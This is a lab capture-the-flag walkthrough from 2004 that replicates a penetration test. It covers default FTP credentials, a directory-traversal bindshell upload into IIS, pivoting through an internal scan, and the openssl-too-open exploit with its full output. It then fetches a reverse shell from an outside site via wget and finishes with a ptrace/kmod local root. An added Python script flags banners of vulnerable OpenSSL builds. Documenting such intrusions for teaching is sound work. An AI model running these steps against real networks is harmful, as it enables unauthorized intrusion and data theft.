This is a possible solution to hacking competition #6, held on SecureIT (15.1.04).
This is actually a replication, under lab conditions, of one of my recent penetration tests, which I enjoyed thoroughly.
I would like to thank the anonymous company for allowing me to replicate their network environment, and allowing me to write up this tutorial. Cheers to you all.
1. A quick scan of hacktest.no-ip.com reveals several open ports. The fact that ports 1025 / 1026 / 3372 (dynamic RPC endpoints and MSDTC, ports a perimeter firewall would normally block) are reachable suggests this machine is not firewalled and is connected directly to the internet.
2. It looks like a Windows 2000 box, judging by the versions of the web and SMTP servers (Microsoft-IIS/5.0 and Microsoft ESMTP 5.0.2195). There also seems to be a third-party FTP server: Flash FTP Server 2.1.
3. I seem to remember seeing a recent vulnerability in Flash FTP Server, and a quick Google search confirms my suspicion.
4. With a bit of trial and error, I find that the FTP username and password are ftp / ftp.
5. I log on to the FTP server and check where its home directory lies (C:\internet\ftpserver, as the later listings show). Using a directory-traversal path in the upload, I place a bindshell (srvcmd.exe) in the default location of the IIS "scripts" directory, where IIS will execute it for me.
6. Once that is done, I execute srvcmd.exe by requesting it through my web browser.
7. Once executed, the bindshell listens on port 2323 and hands out a cmd.exe shell. A look around from that shell shows a second network interface on a private range: this is a dual-homed machine.
8. We now have IUSR (the IIS anonymous account) privileges on the Windows box, and the ability to FTP files to the machine using username ftp / ftp.
9. We upload our favourite toolkit to the FTP server, including a port scanner (Foundstone's ScanLine, sl.exe), and scan the internal network (192.168.0.0/24). The bindshell echoes each command back before its output, which is why every command appears twice below.
C:\internet\ftpserver>sl -bhtz 192.168.0.1-254
sl -bhtz 192.168.0.1-254
Scan of 254 IPs started at Thu Jan 15 19:28:45 2004
------------------------------------------------------------------------------
192.168.0.1
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389
UDP ports: 53 67 68 135 137 138 445 500 3456
TCP 25:
[220 5604625cc767428 Microsoft ESMTP MAIL Service, Version: 5.0.2195.6713 ready at Thu, 15 Jan 2004 19:28:54 -0800]
TCP 80:
[HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date: Fri, 16 Jan 2004 03:28:55 GMT Location: localstart.asp Connection: Keep-Alive Content-Length: 121C]
------------------------------------------------------------------------------
192.168.0.111
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 22 80 111 389 443 3306 10000 32768
UDP ports: 68 69 111 123 135 137 138 191 192 256 260 407 445 500 514 520 1009 1024 1027 1028 1030 1033 1034 1035 1037 1041 1058 1060 1091 1352 1645 1646 1812 1813 1900 1978 2002 2049 2140 2161 2301 2493 2631 2967 3179 3327 3456 4045 4156 4296 4469 4802 5631 11487 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32778 32779 32780 32781 32782 32783 32784 32785 32786 32787 32788 32789 43981
TCP 21:
[Compiled-in modules: mod_core.c mod_auth.c mod_xfer.c mod_site.c mod_ls.c mod_unixpw.c mod_log.c mod_linuxprivs.c mod_ratio.c mod_readme.c mod_pam.c mod_quot]
TCP 22:
[SSH-1.99-OpenSSH_3.1p1]
TCP 80:
[HTTP/1.1 200 OK Date: Thu, 15 Jan 2004 19:55:17 GMT Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c PHP/4.1.2]
TCP 443:
[HTTP/1.1 400 Bad Request Date: Thu, 15 Jan 2004 19:55:20 GMT Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c]
TCP 3306:
[D j Host '192.168.0.1' is not allowed to connect to this MySQL server]
TCP 10000:
[HTTP/1.0 400 Bad Request]
------------------------------------------------------------------------------
192.168.0.201
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 80 139 389
UDP ports: 135 137
TCP 80:
[HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 15 Jan 2004 14:55:18 GMT Connection: Keep-Alive Content-Length: 1270 Content-Type: text/html Set-Cookie:]
------------------------------------------------------------------------------
192.168.0.202
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 110 389
UDP ports:
TCP 21:
[220 box82. FTP server (Version wu-2.6.0(5) Thu Jan 15 14:55:16 EST 2004) ready. 530 Please login with USER and PASS. 530 Please login with USER and PASS.]
TCP 110:
[+OK POP3 box82 V1999 server ready -ERR Null command -ERR Null command]
------------------------------------------------------------------------------
192.168.0.203
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 23 389
UDP ports:
------------------------------------------------------------------------------
192.168.0.204
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 22 389
UDP ports:
TCP 22:
[SSH-1.5-2.40]
------------------------------------------------------------------------------
192.168.0.205
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 15 389
UDP ports:
------------------------------------------------------------------------------
Scan finished at Thu Jan 15 19:29:25 2004
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
7 IPs and 1869 ports scanned in 0 hours 0 mins 40.87 secs
C:\internet\ftpserver>
10. Several machines show up, including their banners. All machines other than 192.168.0.111 are virtual: I was running HoneyD to simulate a larger network. Identifying the real Linux box (192.168.0.111, running Mandrake 8.2) took a long time, so I'll cut the story short.
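As an added example (editor's code, not part of the original writeup): a small Python parser for ScanLine reports like the one above, followed by a banner triage that flags the Apache/OpenSSL build that openssl-too-open, used in the next step, goes after. The sample text is a constructed, trimmed excerpt of the scan above. The version threshold is the editor's, not the page's: anything older than OpenSSL 0.9.6e, the release that fixed the SSLv2 KEY_ARG overflow (CVE-2002-0656) that openssl-too-open exploits. A distribution that backported the fix without changing the version string would show up as a false positive, so the flag is a candidate list, not proof.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in ScanLine 1.01 output format, trimmed from the scan
# above for this example; not a fresh capture.
SAMPLE = """\
Scan of 254 IPs started at Thu Jan 15 19:28:45 2004
------------------------------------------------------------------------------
192.168.0.1
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 25 80 135 139 443 445 1025 1026 3372 3389
UDP ports: 53 67 68 135 137 138 445 500 3456
TCP 80:
[HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Location: localstart.asp]
------------------------------------------------------------------------------
192.168.0.111
Responded in 0 ms.
0 hops away
Responds with ICMP unreachable: Yes
TCP ports: 21 22 80 111 389 443 3306 10000 32768
UDP ports: 68 69 111 123
TCP 22:[SSH-1.99-OpenSSH_3.1p1]
TCP 80:[HTTP/1.1 200 OK Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c PHP/4.1.2]
TCP 443:
[HTTP/1.1 400 Bad Request Server: Apache-AdvancedExtranetServer/1.3.23 (Mandrake Linux/4mdk) mod_ssl/2.8.7 OpenSSL/0.9.6c]
------------------------------------------------------------------------------
192.168.0.205
Responded in 0 ms.
TCP ports: 15 389
UDP ports:
------------------------------------------------------------------------------
Scan finished at Thu Jan 15 19:29:25 2004
"""

IP_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# "TCP 22:" alone, or "TCP 22:[banner]" when ScanLine puts both on one line.
SVC_RE = re.compile(r"^(TCP|UDP) (\d+):\s*(?:\[(.*)\])?$")


@dataclass
class Host:
    ip: str
    tcp: list = field(default_factory=list)
    udp: list = field(default_factory=list)
    banners: dict = field(default_factory=dict)  # TCP port -> banner text


def parse_scanline(text):
    """Turn ScanLine's text report into Host records."""
    hosts, cur, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("-----") or line.startswith("Scan "):
            continue
        if IP_RE.match(line):
            cur, pending = Host(line), None
            hosts.append(cur)
        elif cur is None:
            continue
        elif pending is not None and line.startswith("["):
            cur.banners[pending] = line.strip("[]").strip()  # banner on its own line
            pending = None
        elif line.startswith("TCP ports:"):
            cur.tcp = [int(p) for p in line.split(":", 1)[1].split()]
        elif line.startswith("UDP ports:"):
            cur.udp = [int(p) for p in line.split(":", 1)[1].split()]
        else:
            m = SVC_RE.match(line)
            if m and m.group(1) == "TCP":
                port, banner = int(m.group(2)), m.group(3)
                if banner is None:
                    pending = port  # banner follows on the next line
                else:
                    cur.banners[port] = banner.strip()
    return hosts


OPENSSL_RE = re.compile(r"OpenSSL/(\d+)\.(\d+)\.(\d+)([a-z]?)")


def openssl_version(banner):
    """(major, minor, patch, letter) from an Apache Server: banner, or None."""
    m = OPENSSL_RE.search(banner)
    return None if m is None else (int(m[1]), int(m[2]), int(m[3]), m[4])


def keyarg_overflow_candidate(version):
    """True for builds older than 0.9.6e, the release that fixed the SSLv2
    KEY_ARG overflow (CVE-2002-0656) that openssl-too-open exploits.
    Assumption: the banner is honest; a distro that backported the fix
    without bumping the version string would be a false positive."""
    return version < (0, 9, 6, "e")


def triage(hosts):
    """{ip: [(port, finding), ...]} for every host advertising a candidate build."""
    findings = {}
    for h in hosts:
        for port, banner in sorted(h.banners.items()):
            v = openssl_version(banner)
            if v is not None and keyarg_overflow_candidate(v):
                note = "OpenSSL %d.%d.%d%s < 0.9.6e: SSLv2 KEY_ARG overflow (CVE-2002-0656)" % v
                findings.setdefault(h.ip, []).append((port, note))
    return findings


if __name__ == "__main__":
    for ip, items in triage(parse_scanline(SAMPLE)).items():
        for port, note in items:
            print("%s tcp/%d  %s" % (ip, port, note))
```

Run stand-alone it prints the two hits on 192.168.0.111 (ports 80 and 443 carry the same Server: line; only 443 actually speaks SSL, so that is the port the exploit is aimed at). Port 443 answers ScanLine's plaintext probe with "400 Bad Request" because ScanLine talks HTTP, not SSL, to it; the banner is still useful because Apache sends its Server: header regardless.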
11. I identify a quickly exploitable service on the Mandrake machine: mod_ssl built against OpenSSL 0.9.6c, which is vulnerable to the SSLv2 KEY_ARG overflow that openssl-too-open exploits. I upload a Cygwin-compiled build of the exploit, together with the DLLs it needs (cygwin1.dll and cygcrypto-0.9.7.dll, visible in the listing below), into the FTP directory. I execute the exploit from the bindshell and get a shell on the internal Mandrake box.
C:\internet\ftpserver>dir
dir
Volume in drive C has no label.
Volume Serial Number is 20AA-0A2D
Directory of C:\internet\ftpserver
01/15/2004 07:32p <DIR> .
01/15/2004 07:32p <DIR> ..
01/15/2004 07:32p 705,042 cygcrypto-0.9.7.dll
01/15/2004 07:32p 666,528 cygwin1.dll
01/14/2004 07:16p <DIR> Logs
01/15/2004 04:48p 59,392 nc.exe
01/15/2004 07:32p 122,368 openssl-too-open.exe
01/15/2004 06:40p 20,480 sl.exe
01/14/2004 11:01p 32,768 srvcmd.exe
6 File(s) 1,606,578 bytes
3 Dir(s) 2,579,120,128 bytes free
C:\internet\ftpserver>openssl-too-open.exe -a 0x15 -v 192.168.0.111
openssl-too-open.exe -a 0x15 -v 192.168.0.111
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x811c038
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x811c038
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x811c038
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x811c038 start_addr: 0x811bf78 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux box82 2.4.18-6mdk #1 Fri Mar 15 02:59:08 CET 2002 i586 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root vc/1 - 2:31pm 7:23 0.41s 0.36s -bash
bash-2.05$
12. The shell I get is a bit unstable and echoes every command twice, so I decide to upload a reverse shell to the Mandrake box and have it connect back to my attacking machine. I do this with wget, retrieving the rbs.c file from www.secureit.co.il (this relies on the internal box having outbound HTTP access; otherwise the file would have to be pushed through the Windows pivot).
13. Once that is done, I compile and execute the reverse shell while netcat listens on port 4000 on the attacking machine. This gives me a cleaner shell, still with "apache" user privileges.
14. Recalling the output of uname (Linux box82 2.4.18-6mdk), I decide to attempt privilege escalation with the Linux kernel ptrace/kmod local root exploit, which works against a range of unpatched 2.2.x and 2.4.x kernels. Note the earlier output of w: root is logged in on the console (vc/1), so anything noisy on this box may be noticed.
15. I download the exploit (wget again), compile and execute it, hoping for the best.
16. The exploit succeeds, and we now have root privileges on the Mandrake box. The target .doc file was located at /root/C.doc.
Mati Aharoni, MCSES, MCT, CCNA, CCSA, CISSP
Visit the Security through Hacking Web site at http://www.secureit.co.il for additional information.